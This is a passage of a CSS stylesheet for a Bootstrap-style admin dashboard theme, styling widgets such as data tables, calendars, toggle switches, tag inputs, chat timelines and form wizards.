margin-bottom: 5px;
}
.summary-head p {
color: rgba(256,256,256,0.6);
}
ul.summary-list {
display: inline-block;
padding-left:0 ;
width: 100%;
margin-bottom: 0;
}
ul.summary-list > li {
display: inline-block;
width: 19.5%;
text-align: center;
}
ul.summary-list > li > a > i {
display:block;
font-size: 18px;
padding-bottom: 5px;
}
ul.summary-list > li > a {
padding: 10px 0;
display: inline-block;
color: #818181;
}
ul.summary-list > li {
border-right: 1px solid #eaeaea;
}
ul.summary-list > li:last-child {
border-right: none;
}
.activity {
width: 100%;
float: left;
margin-bottom: 10px;
}
.activity.alt {
width: 100%;
float: right;
margin-bottom: 10px;
}
.activity span {
float: left;
}
.activity.alt span {
float: right;
}
.activity span, .activity.alt span {
width: 45px;
height: 45px;
line-height: 45px;
border-radius: 50%;
-webkit-border-radius: 50%;
background: #eee;
text-align: center;
color: #fff;
font-size: 16px;
}
.activity.terques span {
background: #8dd7d6;
}
.activity.terques h4 {
color: #8dd7d6;
}
.activity.purple span {
background: #b984dc;
}
.activity.purple h4 {
color: #b984dc;
}
.activity.blue span {
background: #90b4e6;
}
.activity.blue h4 {
color: #90b4e6;
}
.activity.green span {
background: #aec785;
}
.activity.green h4 {
color: #aec785;
}
.activity h4 {
margin-top:0 ;
font-size: 16px;
}
.activity p {
margin-bottom: 0;
font-size: 13px;
}
.activity .activity-desk i, .activity.alt .activity-desk i {
float: left;
font-size: 18px;
margin-right: 10px;
color: #bebebe;
}
.activity .activity-desk {
margin-left: 70px;
position: relative;
}
.activity.alt .activity-desk {
margin-right: 70px;
position: relative;
}
.activity.alt .activity-desk .panel {
float: right;
position: relative;
}
.activity-desk .panel {
background: #F4F4F4 ;
display: inline-block;
}
.activity .activity-desk .arrow {
border-right: 8px solid #F4F4F4 !important;
}
.activity .activity-desk .arrow {
border-bottom: 8px solid transparent;
border-top: 8px solid transparent;
display: block;
height: 0;
left: -7px;
position: absolute;
top: 13px;
width: 0;
}
.activity-desk .arrow-alt {
border-left: 8px solid #F4F4F4 !important;
}
.activity-desk .arrow-alt {
border-bottom: 8px solid transparent;
border-top: 8px solid transparent;
display: block;
height: 0;
right: -7px;
position: absolute;
top: 13px;
width: 0;
}
.activity-desk .album {
display: inline-block;
margin-top: 10px;
}
.activity-desk .album a{
margin-right: 10px;
}
.activity-desk .album a:last-child{
margin-right: 0px;
}
/*invoice*/
.invoice-list {
margin-bottom: 30px;
}
.invoice-list h4 {
font-weight: 300;
font-size: 16px;
}
.invoice-block {
text-align: right;
}
ul.amounts li {
background: #f5f5f5;
margin-bottom: 5px;
padding: 10px;
border-radius: 4px;
-webkit-border-radius: 4px;
font-weight: 300;
}
.invoice-btn a{
font-weight: 300;
margin: 0 5px;
font-size: 16px;
}
.corporate-id {
margin-bottom: 30px;
}
/*panel heading color*/
.panel-primary > .panel-heading.navyblue {
background-color: #2A3542;
border-color: #2A3542;
color: #FFFFFF;
}
/*table*/
.table-advance tr td {
vertical-align: middle !important;
}
.no-border {
border-bottom: none;
}
.dataTables_length , .dataTables_filter{
padding:15px;
}
.dataTables_info{
padding:0 15px;
}
.dataTables_filter {
float: right;
}
.dataTables_length select {
width: 65px;
padding:5px 8px;
}
.dataTables_length label, .dataTables_filter label {
font-weight: 300;
}
.dataTables_filter label {
width: 100%;
}
.dataTables_filter label input {
width: 78%;
}
.border-top {
border-top: 1px solid #ddd;
}
.dataTables_paginate.paging_bootstrap.pagination li {
float: left;
margin: 0 1px;
border: 1px solid #ddd;
border-radius: 3px;
-webkit-border-radius: 3px;
}
.dataTables_paginate.paging_bootstrap.pagination li.disabled a{
color: #c7c7c7;
}
.dataTables_paginate.paging_bootstrap.pagination li a{
color: #797979;
padding: 5px 10px;
display: inline-block;
}
.dataTables_paginate.paging_bootstrap.pagination li:hover a, .dataTables_paginate.paging_bootstrap.pagination li.active a{
color: #797979;
background: #eee;
border-radius: 3px;
-webkit-border-radius: 3px;
}
.dataTables_paginate.paging_bootstrap.pagination {
float: right;
margin-right: 15px;
margin-top: -5px;
margin-bottom: 15px;
}
.dataTable tr:last-child {
border-bottom: 1px solid #ddd;
}
/*calender*/
.has-toolbar.fc {
margin-top: 50px;
}
.fc-header-title {
display: inline-block;
margin-top: -50px;
vertical-align: top;
}
.fc-view {
margin-top: -50px;
overflow: hidden;
width: 100%;
}
.fc-state-default, .fc-state-default .fc-button-inner {
background: #F3F3F3 !important;
border-color: #DDDDDD;
border-style: none solid;
color: #646464;
}
.fc-state-active, .fc-state-active .fc-button-inner,
.fc-state-hover, .fc-state-hover .fc-button-inner{
background: #FF6C60 !important;
color: #fff !important;
}
.fc-event-skin {
background-color: #6883a3 !important;
border-color: #6883a3 !important;
color: #FFFFFF !important;
}
.fc-grid th {
height: 30px;
line-height: 30px;
text-align: center;
background: #F3F3F3 !important;
}
.fc-header-title h2 {
font-size: 20px !important;
color: #C8CCD7;
font-weight: 300;
}
.external-event {
cursor: move;
display: inline-block !important;
margin-bottom: 6px !important;
margin-right: 6px !important;
padding: 8px;
}
#external-events p input[type="checkbox"]{
margin: 0;
}
.drg-event-title {
font-weight: 300;
margin-top: 0;
margin-bottom: 15px;
border-bottom: 1px solid #ddd;
padding-bottom: 10px;
}
.fc-content .fc-event {
border-radius:4px;
webkit-border-radius:4px;
padding: 4px 6px;
}
.fc-corner-left {
border-radius: 4px 0 0 4px;
-webkit-border-radius: 4px 0 0 4px;
}
.fc-corner-right {
border-radius: 0 4px 4px 0;
-webkit-border-radius: 0 4px 4px 0;
}
.drp-rmv {
padding-top: 10px;
margin-top: 10px;
}
/*button*/
.btn-row {
margin-bottom: 10px;
}
/*tabs*/
.tab-head {
background: #7087a3;
display: inline-block;
width: 100%;
margin-top: 60px;
}
.tab-container {
margin-top: 10px;
}
.tab-head .nav-tabs > li > a {
border-radius: 0;
margin-right: 1px;
color: #fff;
}
.tab-head .nav-tabs > li.active > a, .tab-head .nav-tabs > li > a:hover, .tab-head .nav-tabs > li.active > a:hover, .tab-head .nav-tabs > li.active > a:focus {
background-color: #f1f2f7;
border-color: #f1f2f7;
color: #797979;
}
/*general page*/
.progress-xs {
height: 8px;
}
.progress-sm {
height: 12px;
}
.panel-heading .nav {
border: medium none;
font-size: 13px;
margin: -10px -15px -11px;
}
.tab-bg-dark-navy-blue {
background: #7087A3;
border-radius: 5px 5px 0 0;
-webkit-border-radius: 5px 5px 0 0;
border-bottom: none;
}
.panel-heading .nav > li > a,
.panel-heading .nav > li.active > a, .panel-heading .nav > li.active > a:hover, .panel-heading .nav > li.active > a:focus {
border-width: 0;
border-radius: 0;
}
.panel-heading .nav > li > a {
color: #fff;
}
.panel-heading .nav > li.active > a, .panel-heading .nav > li > a:hover {
color: #47596f;
background: #fff;
}
.panel-heading .nav > li:first-child.active > a, .panel-heading .nav > li:first-child > a:hover {
border-radius: 4px 0 0 0;
-webkit-border-radius: 4px 0 0 0;
}
.tab-right {
height: 38px;
}
.panel-heading.tab-right .nav > li:first-child.active > a, .tab-right.panel-heading .nav > li:first-child > a:hover {
border-radius: 0 ;
-webkit-border-radius: 0 ;
}
.panel-heading.tab-right .nav > li:last-child.active > a, .tab-right.panel-heading .nav > li:last-child > a:hover {
border-radius: 0 4px 0 0;
-webkit-border-radius: 0 4px 0 0;
}
.panel-heading.tab-right .nav-tabs > li > a {
margin-left: 1px;
margin-right: 0px;
}
.m-bot20 {
margin-bottom: 20px;
}
.m-bot-none {
margin-bottom: 0;
}
.wht-color {
color: #fff;
}
.close-sm {
font-size: 14px;
}
/*carousel*/
.carousel-indicators li {
background: rgba(0, 0, 0, 0.2) ;
border: none;
transition:background-color 0.25s ease 0s;
-moz-transition:background-color 0.25s ease 0s;
-webkit-transition:background-color 0.25s ease 0s;
}
.carousel-indicators .active {
background:#ff6c60;
height: 10px;
margin: 1px;
width: 10px;
}
.carousel-indicators.out {
bottom: -5px;
}
.carousel-indicators.out {
bottom: -5px;
}
.carousel-control {
color: #999999;
text-shadow: none;
width: 45px;
}
.carousel-control i {
display: inline-block;
height: 25px;
left: 50%;
margin-left: -10px;
margin-top: -10px;
position: absolute;
top: 50%;
width: 20px;
z-index: 5;
}
.carousel-control.left, .carousel-control.right {
background: none;
filter:none;
}
.carousel-control:hover, .carousel-control:focus {
color: #CCCCCC;
opacity: 0.9;
text-decoration: none;
}
.carousel-inner h3 {
font-weight: 300;
font-size: 16px;
margin: 0;
}
.carousel-inner {
margin-bottom: 15px;
}
/*gritter*/
.gritter-close {
left: auto !important;
right: 3px !important;
}
/*form*/
.sm-input {
width: 175px;
}
.form-horizontal.tasi-form .form-group {
border-bottom: 1px solid #eff2f7;
padding-bottom: 15px;
margin-bottom: 15px;
}
.form-horizontal.tasi-form .form-group:last-child {
border-bottom: none;
padding-bottom: 0px;
margin-bottom: 0px;
}
.form-horizontal.tasi-form .form-group .help-block {
margin-bottom: 0;
}
.round-input {
border-radius: 500px;
-webkit-border-radius: 500px;
}
.m-bot15 {
margin-bottom: 15px;
}
.form-horizontal.tasi-form .checkbox-inline > input {
margin-top: 1px;
border:none;
}
/*form validation*/
.cmxform .form-group label.error {
display: inline;
margin: 5px 0;
color: #B94A48;
font-weight: 400;
}
input:focus:invalid:focus, textarea:focus:invalid:focus, select:focus:invalid:focus, .cmxform .form-group input.error , .cmxform .form-group textarea.error{
border-color: #B94A48 !important;
}
#signupForm label.error {
display: inline;
margin:5px 0px;
width: auto;
color: #B94A48;
}
.checkbox, .checkbox:hover, .checkbox:focus {
border:none;
}
/*slider*/
table.sliders tr td {
padding: 30px 0;
border:none;
}
.slider {
margin-top: 3px;
}
.slider-info {
padding-top: 10px;
}
.sliders .ui-widget-header {
background: #22bacf !important;
border-radius: 15px !important;
-webkit-border-radius: 15px !important;
}
.ui-corner-all, .ui-corner-bottom, .ui-corner-right, .ui-corner-br {
border-bottom-right-radius: 0 !important;
}
.ui-corner-all, .ui-corner-bottom, .ui-corner-left, .ui-corner-bl {
border-bottom-left-radius: 0 !important;
}
.ui-corner-all, .ui-corner-top, .ui-corner-right, .ui-corner-tr {
border-top-right-radius: 0 !important;
}
.ui-corner-all, .ui-corner-top, .ui-corner-left, .ui-corner-tl {
border-top-left-radius: 0 !important;
}
#eq span {
height:120px; float:left; margin:15px
}
.ui-widget-content {
background: #f0f2f7 !important;
border: none !important;
border-radius: 15px !important;
-webkit-border-radius: 15px !important;
}
.ui-slider-horizontal {
height: 8px !important;
}
.ui-slider-horizontal .ui-slider-handle {
top: -0.57em !important;
}
.ui-state-default, .ui-widget-content .ui-state-default, .ui-widget-header .ui-state-default {
background: #fff !important;
border: 3px solid #22bacf !important;
border-radius: 50% !important;
-webkit-border-radius: 50% !important;
}
.ui-slider-vertical {
width: 8px !important;
}
.ui-slider-vertical .ui-slider-handle {
left: -0.5em !important;
}
.ui-slider .ui-slider-handle {
cursor: default;
height: 1.6em;
position: absolute;
width: 1.6em;
z-index: 2;
}
.bound-s {
width: 90px;
margin-bottom: 15px;
}
/*----switch ----*/
.has-switch {
border-radius: 30px;
-webkit-border-radius: 30px;
display: inline-block;
cursor: pointer;
line-height: 1.231;
overflow: hidden;
position: relative;
text-align: left;
width: 80px;
-webkit-mask: url('../img/mask.png') 0 0 no-repeat;
mask: url('../img/mask.png') 0 0 no-repeat;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
-o-user-select: none;
user-select: none;
}
.has-switch.deactivate {
opacity: 0.5;
filter: alpha(opacity=50);
cursor: default !important;
}
.has-switch.deactivate label,
.has-switch.deactivate span {
cursor: default !important;
}
.has-switch > div {
width: 162%;
position: relative;
top: 0;
}
.has-switch > div.switch-animate {
-webkit-transition: left 0.25s ease-out;
-moz-transition: left 0.25s ease-out;
-o-transition: left 0.25s ease-out;
transition: left 0.25s ease-out;
-webkit-backface-visibility: hidden;
}
.has-switch > div.switch-off {
left: -63%;
}
.has-switch > div.switch-off label {
background-color: #7f8c9a;
border-color: #bdc3c7;
-webkit-box-shadow: -1px 0 0 rgba(255, 255, 255, 0.5);
-moz-box-shadow: -1px 0 0 rgba(255, 255, 255, 0.5);
box-shadow: -1px 0 0 rgba(255, 255, 255, 0.5);
}
.has-switch > div.switch-on {
left: 0%;
}
.has-switch > div.switch-on label {
background-color: #41cac0;
}
.has-switch input[type=checkbox] {
display: none;
}
.has-switch span {
cursor: pointer;
font-size: 14.994px;
font-weight: 700;
float: left;
height: 29px;
line-height: 19px;
margin: 0;
padding-bottom: 6px;
padding-top: 5px;
position: relative;
text-align: center;
width: 50%;
z-index: 1;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
-webkit-transition: 0.25s ease-out;
-moz-transition: 0.25s ease-out;
-o-transition: 0.25s ease-out;
transition: 0.25s ease-out;
-webkit-backface-visibility: hidden;
}
.has-switch span.switch-left {
border-radius: 30px 0 0 30px;
background-color: #2A3542;
color: #41cac0;
border-left: 1px solid transparent;
}
.has-switch span.switch-right {
border-radius: 0 30px 30px 0;
background-color: #bdc3c7;
color: #ffffff;
text-indent: 7px;
}
.has-switch span.switch-right [class*="fui-"] {
text-indent: 0;
}
.has-switch label {
border: 4px solid #2A3542;
border-radius: 50%;
-webkit-border-radius: 50%;
float: left;
height: 29px;
margin: 0 -21px 0 -14px;
padding: 0;
position: relative;
vertical-align: middle;
width: 29px;
z-index: 100;
-webkit-transition: 0.25s ease-out;
-moz-transition: 0.25s ease-out;
-o-transition: 0.25s ease-out;
transition: 0.25s ease-out;
-webkit-backface-visibility: hidden;
}
.switch-square {
border-radius: 6px;
-webkit-border-radius: 6px;
-webkit-mask: url('../img/mask.png') 0 0 no-repeat;
mask: url('../img/mask.png') 0 0 no-repeat;
}
.switch-square > div.switch-off label {
border-color: #7f8c9a;
border-radius: 6px 0 0 6px;
}
.switch-square span.switch-left {
border-radius: 6px 0 0 6px;
}
.switch-square span.switch-left [class*="fui-"] {
text-indent: -10px;
}
.switch-square span.switch-right {
border-radius: 0 6px 6px 0;
}
.switch-square span.switch-right [class*="fui-"] {
text-indent: 5px;
}
.switch-square label {
border-radius: 0 6px 6px 0;
border-color: #41cac0;
}
/*tag input*/
.tagsinput {
border: 1px solid #e3e6ed;
border-radius: 6px;
height: 100px;
padding: 6px 1px 1px 6px;
overflow-y: auto;
text-align: left;
}
.tagsinput .tag {
border-radius: 4px;
background-color: #41cac0;
color: #ffffff;
cursor: pointer;
margin-right: 5px;
margin-bottom: 5px;
overflow: hidden;
line-height: 15px;
padding: 6px 13px 8px 19px;
position: relative;
vertical-align: middle;
display: inline-block;
zoom: 1;
*display: inline;
-webkit-transition: 0.14s linear;
-moz-transition: 0.14s linear;
-o-transition: 0.14s linear;
transition: 0.14s linear;
-webkit-backface-visibility: hidden;
}
.tagsinput .tag:hover {
background-color: #39b1a8;
color: #ffffff;
padding-left: 12px;
padding-right: 20px;
}
.tagsinput .tag:hover .tagsinput-remove-link {
color: #ffffff;
opacity: 1;
display: block\9;
}
.tagsinput input {
background: transparent;
border: none;
color: #34495e;
font-family: "Lato", sans-serif;
font-size: 14px;
margin: 0px;
padding: 0 0 0 5px;
outline: 0;
margin-right: 5px;
margin-bottom: 5px;
width: 12px;
}
.tagsinput-remove-link {
bottom: 0;
color: #ffffff;
cursor: pointer;
font-size: 12px;
opacity: 0;
padding: 7px 7px 5px 0;
position: absolute;
right: 0;
text-align: right;
text-decoration: none;
top: 0;
width: 100%;
z-index: 2;
display: none\9;
}
.tagsinput-remove-link:before {
color: #ffffff;
content: "\f00d";
font-family: "FontAwesome";
}
.tagsinput-add-container {
vertical-align: middle;
display: inline-block;
zoom: 1;
*display: inline;
}
.tagsinput-add {
background-color: #d6dbdf;
border-radius: 3px;
color: #ffffff;
cursor: pointer;
margin-bottom: 5px;
padding: 6px 9px;
display: inline-block;
zoom: 1;
*display: inline;
-webkit-transition: 0.25s;
-moz-transition: 0.25s;
-o-transition: 0.25s;
transition: 0.25s;
-webkit-backface-visibility: hidden;
}
.tagsinput-add:hover {
background-color: #3bb8af;
}
.tagsinput-add:before {
content: "\f067";
font-family: "FontAwesome";
}
.tags_clear {
clear: both;
width: 100%;
height: 0px;
}
/*checkbox & radio style*/
.checkboxes label, .radios label {
display: block;
cursor: pointer;
line-height: 20px;
padding-bottom: 7px;
font-weight: 300;
}
.radios {
padding-top: 18px;
}
.label_check input,
.label_radio input {
margin-right: 5px;
}
.has-js .label_check,
.has-js .label_radio {
padding-left: 34px;
}
.has-js .label_radio {
background: url(../img/checkbox/radio-off.png) no-repeat;
}
.has-js .label_check {
background: url(../img/checkbox/check-off.png) no-repeat;
}
.has-js label.c_on {
background: url(../img/checkbox/check-on.png) no-repeat;
}
.has-js label.r_on {
background: url(../img/checkbox/radio-on.png) no-repeat;
}
.has-js .label_check input,
.has-js .label_radio input {
position: absolute;
left: -9999px;
}
/*date picker*/
.add-on {
float: right;
margin-top: -37px;
padding: 3px;
text-align: center;
}
.add-on .btn {
padding: 9px;
}
.daterangepicker .ranges .range_inputs > div:nth-child(2) {
margin-bottom: 10px;
padding-left: 0px;
}
.daterangepicker .ranges label {
padding-bottom: 0;
padding-top: 8px;
}
.daterangepicker td.active, .daterangepicker td.active:hover,
.datepicker td.active:hover, .datepicker td.active:hover:hover, .datepicker td.active:active, .datepicker td.active:hover:active, .datepicker td.active.active, .datepicker td.active.active:hover, .datepicker td.active.disabled, .datepicker td.active.disabled:hover, .datepicker td.active[disabled], .datepicker td.active[disabled]:hover,
.datepicker td span.active:hover, .datepicker td span.active:active, .datepicker td span.active.active, .datepicker td span.active.disabled, .datepicker td span.active[disabled]{
background: #41CAC0;
}
.daterangepicker .calendar th, .daterangepicker .calendar td {
font-family: 'Open Sans', sans-serif;
font-weight: 300;
text-align: center;
white-space: nowrap;
}
.daterangepicker td.active, .daterangepicker td.active:hover, .datepicker td.active, .datepicker td.active:hover, .datepicker td span.active {
text-shadow: none;
}
.datepicker th.switch {
width: 125px;
}
.datepicker td span {
height: 40px;
line-height: 40px;
}
.bootstrap-timepicker table td input {
border: 1px solid #ccc;
border-radius:3px;
-webkit-border-radius:3px;
}
/*ck editor*/
.cke_top, .cke_bottom {
background: #F5F5F5 !important;
background: -moz-linear-gradient(center top , #F5F5F5, #F5F5F5) repeat scroll 0 0 #F5F5F5 !important;
background: -webkit-linear-gradient(center top , #F5F5F5, #F5F5F5) repeat scroll 0 0 #F5F5F5 !important;
background: -o-linear-gradient(center top , #F5F5F5, #F5F5F5) repeat scroll 0 0 #F5F5F5 !important;
box-shadow: none;
padding: 6px 8px 2px;
}
.cke_top {
border-bottom: 1px solid #cccccc !important;
}
.cke_chrome {
display: block;
padding: 0;
}
/*form wizard*/
.stepy-tab {
text-align: center;
}
.stepy-tab ul{
display: inline-block;
}
.stepy-tab ul li {
float: left;
}
.step legend {
border: none;
}
.button-back {
float: left;
}
.button-next, .finish {
float: right;
}
.button-back, .button-next, .finish {
cursor: pointer; text-decoration: none;
}
.step {
clear: left;
}
.step label {
display: block;
}
.stepy-titles li {
color: #757575;
cursor: pointer;
float: left;
margin: 10px 15px;
}
.stepy-titles li span { display: block; }
.stepy-titles li.current-step div {
color: #fff;
cursor: auto;
background: #ED5B5B;
border-radius: 50%;
-webkit-border-radius: 50%;
width: 100px;
height: 100px;
line-height: 100px;
}
.stepy-titles li div{
font-size:16px;
font-weight: 300;
background: #eee;
border-radius: 50%;
-webkit-border-radius: 50%;
width: 100px;
height: 100px;
line-height: 100px;
}
/*widget*/
.user-heading.alt {
display: inline-block;
width: 100%;
text-align: left;
}
.alt.green-bg {
background: #aec785;
}
.profile-nav.alt.green-border ul > li > a:hover, .profile-nav.alt.green-border ul > li > a:focus, .profile-nav.alt.green-border ul li.active a {
border-left: 5px solid #aec785;
}
.user-heading.alt a {
float: left;
margin-right: 15px;
margin-left: -10px;
display: inline-block;
border: 5px solid rgba(255, 255, 255, 0.3);
border-radius: 50%;
-webkit-border-radius: 50%;
}
.user-heading.alt a img{
width: 100px;
height: 100px;
border-radius: 50%;
-webkit-border-radius: 50%;
}
.twt-feed {
border-radius: 4px 4px 0 0;
-webkit-border-radius: 4px 4px 0 0;
color: #FFFFFF;
padding: 10px;
position: relative;
text-align: center;
}
.twt-feed.blue-bg {
background: #58C9F3;
}
.twt-feed h1 {
font-size: 22px;
font-weight: 300;
margin-bottom: 5px;
}
.twt-feed a {
border: 8px solid #fff;
border-radius: 50%;
-webit-border-radius: 50%;
display: inline-block;
margin-bottom: -55px;
}
.twt-feed a img {
height: 112px;
width: 112px;
border-radius: 50%;
-webit-border-radius: 50%;
}
.twt-category {
display: inline-block;
margin-bottom: 11px;
margin-top: 55px;
width: 100%;
}
.twt-category ul li{
color: #89817f;
font-size: 13px;
}
.twt-category h5 {
font-size: 20px;
font-weight: 300;
}
.twt-write .t-text-area {
border: 1px solid #eeeeee;
border-radius: 0;
}
.twt-footer {
padding: 10px 15px;
}
.btn-space {
padding-left: 11.6%;
padding-right: 11%;
}
.p-head {
color: #f77b6f;
font-weight: 400;
font-size: 14px;
}
.cmt-head {
font-weight: 400;
font-size: 13px;
}
.p-thumb img {
width: 50px;
height: 50px;
border-radius: 3px;
-webkit-border-radius: 3px;
}
.tasi-tab .media-body p {
/*color: #b8bac6;*/
}
/*Timeline chat*/
.chat-form {
margin-top: 25px;
clear: both;
}
.chat-form .input-cont {
margin-bottom: 10px;
}
.chat-form .input-cont input {
margin-bottom: 0px;
}
.chat-form .input-cont input{
border: 1px solid #d3d3d3 !important;
margin-top:0;
min-height: 45px;
}
.chat-form .input-cont input {
background-color: #fff !important;
}
.chat-features a {
margin-left: 10px;
}
.chat-features a i{
color: #d0d0d0;
}
.timeline-messages:before {
background: rgba(0, 0, 0, 0.1);
bottom: 0;
top: 0;
width: 2px;
}
.timeline-messages:before, .msg-time-chat:before, .msg-time-chat .text:before {
content: "";
left: 60px;
position: absolute;
top: -2px;
}
.timeline-messages, .msg-time-chat , .timeline-messages .msg-in, .timeline-messages .msg-out {
position: relative;
}
.timeline-messages .msg-in .arrow {
/*border-right: 8px solid #F4F4F4 !important;*/
}
.timeline-messages .msg-in .arrow {
border-bottom: 8px solid transparent;
border-top: 8px solid transparent;
display: block;
height: 0;
left: -8px;
position: absolute;
top: 13px;
width: 0;
}
.timeline-messages .msg-out .arrow {
/*border-right: 8px solid #41cac0 !important;*/
}
.timeline-messages .msg-out .arrow {
border-bottom: 8px solid transparent;
border-top: 8px solid transparent;
display: block;
height: 0;
left: -8px;
position: absolute;
top: 13px;
width: 0;
}
.msg-time-chat:first-child:before {
margin-top: 16px;
}
.msg-time-chat:before {
background:#CCCCCC;
border: 2px solid #FAFAFA;
border-radius: 100px;
-moz-border-radius: 100px;
-webkit-border-radius: 100px;
height: 14px;
margin: 23px 0 0 -6px;
width: 14px;
}
.msg-time-chat:hover:before {
background: #41cac0;
}
.msg-time-chat:first-child {
padding-top: 0;
}
.message-img {
float: left;
margin-right: 30px;
overflow: hidden;
}
.message-img img {
display: block;
height: 44px;
width: 44px;
}
.message-body {
margin-left: 80px;
}
.msg-time-chat .msg-in .text {
border: 1px solid #e3e6ed;
padding: 10px;
border-radius: 4px;
-webkit-border-radius: 4px;
}
.msg-time-chat .msg-out .text {
border: 1px solid #e3e6ed;
padding: 10px;
border-radius: 4px;
-webkit-border-radius: 4px;
}
.msg-time-chat p {
margin: 0;
}
.msg-time-chat .attribution {
font-size: 11px;
margin: 0px 0 5px;
}
.msg-time-chat {
overflow: hidden;
padding:8px 0;
}
.msg-in a, .msg-in a:hover{
color: #b64c4c;
text-decoration: none;
border-radius: 4px;
-webkit-border-radius: 4px;
margin-right: 10px;
font-weight: 400;
font-size: 13px;
}
.msg-out a, .msg-out a:hover{
color: #288f98;
text-decoration: none;
border-radius: 4px;
-webkit-border-radius: 4px;
margin-right: 10px;
font-weight: 400;
font-size: 13px;
}
/*custom select*/
span.customSelect {
font-size:12px;
background-color: #ffffff;
padding:10px;
border:1px solid #EAEAEA;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
color: #A4AABA;
}
span.customSelect.changed {
background-color: #fff;
}
.customSelectInner {
background:url(../img/customSelect-arrow.gif) no-repeat center right;
}
/*boxed page */
.boxed-page {
background-color: #ccc !important;
}
.boxed-page .container {
background: #2A3542;
padding-left: 0;
padding-right: 0;
}
.boxed-page .container #sidebar {
position:inherit;
}
.boxed-page .container .header .container{
background: #fff;
}
.boxed-page .container aside {
float: left;
}
.boxed-page .container .wrapper{
background: #F1F2F7;
min-height: 900px;
}
/*collapsible*/
.tools a {
margin-left: 10px;
color: #a7a7a7;
font-size: 12px;
}
/* google maps */
.gmaps {
height: 300px;
width: 100%;
}
/* star rating */
.rating {
unicode-bidi: bidi-override;
direction: rtl;
font-size: 30px;
}
.rating span.star,
.rating span.star {
font-family: FontAwesome;
font-weight: normal;
font-style: normal;
display: inline-block;
}
.rating span.star:hover,
.rating span.star:hover {
cursor: pointer;
}
.rating span.star:before,
.rating span.star:before {
content: "\f006";
padding-right: 5px;
color: #BEC3C7;
}
.rating span.star:hover:before,
.rating span.star:hover:before,
.rating span.star:hover ~ span.star:before,
.rating span.star:hover ~ span.star:before {
content: "\f005";
color: #41CAC0;
}
/*search page*/
.classic-search {
margin-bottom: 30px;
}
.classic-search h4 {
margin-bottom: 3px;
font-weight: 300;
font-size: 16px;
}
.classic-search h4 a {
color: #314558;
}
.classic-search h4 a:hover {
text-decoration: underline;
}
/*ckEditor*/
#editor-container
{
width: 100%;
margin: 10px auto 0;
}
#header-editor
{
overflow: hidden;
padding: 0 0 30px;
border-bottom: 1px solid #eaeaea;
position: relative;
}
#headerLeft,
#headerRight
{
width: 49%;
overflow: hidden;
}
#headerLeft
{
float: left;
padding: 10px 1px 1px;
}
#headerLeft h2,
#headerLeft h3
{
margin: 0;
overflow: hidden;
font-weight: normal;
font-family: 'Open Sans', sans-serif;
}
#headerLeft h2
{
font-size: 2.6em;
line-height: 1.1em;
text-transform: capitalize;
color: #314558;
margin-bottom: 20px;
}
#headerLeft h3
{
font-size: 1.5em;
line-height: 1.1em;
margin: .2em 0 0;
color: #757575;
}
#headerRight
{
float: right;
padding: 1px;
}
#headerRight p
{
line-height: 1.8em;
text-align: justify;
margin: 0;
}
#headerRight p + p
{
margin-top: 20px;
}
#headerRight > div
{
padding: 20px;
margin: 0 0 0 30px;
font-size: 1.1em;
color: #757575;
}
#columns
{
color: #757575;
overflow: hidden;
padding: 20px 0;
}
#columns h3 {
color: #314558;
}
#columns > div
{
float: left;
width: 33.3%;
}
#columns #column1 > div
{
margin-left: 1px;
}
#columns #column3 > div
{
margin-right: 1px;
}
#columns > div > div
{
margin: 0px 10px;
padding: 10px 20px;
}
#columns blockquote
{
margin-left: 15px;
}
#taglist {
display: inline-block;
margin-left: 20px;
font-weight: bold;
margin: 0 0 0 20px;
}
.cke_editable.cke_editable_inline.cke_focus {
background: #fcfcfc;
border: 1px solid #eaeaea;
cursor: text;
outline: medium none;
}
/*advanced table*/
.adv-table table tr td {
padding: 10px;
}
.adv-table table.display thead th {
border-bottom: 1px solid #DDDDDD;
padding: 10px;
}
tr.odd.gradeA td.sorting_1, tr.odd td.sorting_1, tr.even.gradeA td.sorting_1 {
background: none;
}
td.details {
background-color: #eee;
}
td.details table tr td, .dataTable tr:last-child {
border: none;
}
.adv-table table.display tr.odd.gradeA {
background-color: #F9F9F9;
}
.adv-table table.display tr.even.gradeA {
background-color: #FFFFFF;
}
.adv-table .dataTables_filter label input {
float: right;
margin-left: 10px;
width: 78%;
}
.adv-table .dataTables_filter label {
line-height: 33px;
width: 100%;
}
.adv-table .dataTables_length select {
display: inline-block;
margin: 0 10px;
padding: 5px 8px;
width: 65px;
}
.adv-table .dataTables_info, .dataTables_paginate {
padding: 15px;
}
.adv-table .dataTables_length,.adv-table .dataTables_filter {
padding: 15px 0;
}
.cke_chrome {
border: none !important;
}
.editable-table .dataTables_filter {
width: 80%;
}
tr.odd.gradeX td.sorting_1, tr.even.gradeX td.sorting_1, table.display tr.even.gradeX, table.display tr.gradeX, tr.even.gradeU td.sorting_1, tr.even td.sorting_1, table.display tr.even.gradeC, table.display tr.gradeC, tr.odd.gradeC td.sorting_1, table.display tr.even.gradeU, table.display tr.gradeU, tr.odd.gradeU td.sorting_1{
background: none !important;
}
/*flot chart*/
.flot-chart .chart, .flot-chart .pie, .flot-chart .bars {
height: 300px;
}
/*xchart*/
.demo-xchart {
height: 400px;
width: 100%;
}
/*Horizontal menu*/
.full-width #main-content {
margin-left: 0;
}
.horizontal-menu {
margin-left: 50px;
float: left;
}
.horizontal-menu .navbar-nav > li > a {
padding-bottom: 20px;
padding-top: 20px;
}
.full-width .navbar-header {
width: 100%;
}
.full-width .nav > li > a:hover, .full-width .nav li.active a, .full-width .nav li.dropdown a:hover , .full-width .nav li.dropdown.open a:focus, .full-width .nav .open > a, .full-width .nav .open > a:hover, .full-width .nav .open > a:focus{
background-color: #F77B6F;
text-decoration: none;
color: #fff;
transition: all 0.3s ease 0s;
-webkit-transition: all 0.3s ease 0s;
}
.full-width .dropdown-menu {
box-shadow: none;
}
.full-width .dropdown-menu > li > a {
padding: 10px 20px;
font-size: 13px;
}
/*advanced form*/
.form-body {
padding: 20px;
}
/*multiselect*/
.ms-container .ms-selectable li.ms-hover, .ms-container .ms-selection li.ms-hover {
background-color: #2A3542;
color: #FFFFFF;
cursor: pointer;
text-decoration: none;
}
.ms-container .ms-list, .ms-container .ms-list.ms-focus {
box-shadow: none !important;
}
.ms-container .ms-list.ms-focus {
border: 1px solid #2A3542;
}
.ms-selectable .search-input, .ms-selection .search-input{
margin-bottom: 10px;
}
/*spinner*/
.spinner-buttons.btn-group-vertical .btn {
height: 17px;
margin: 0;
padding-left: 6px;
padding-right: 6px;
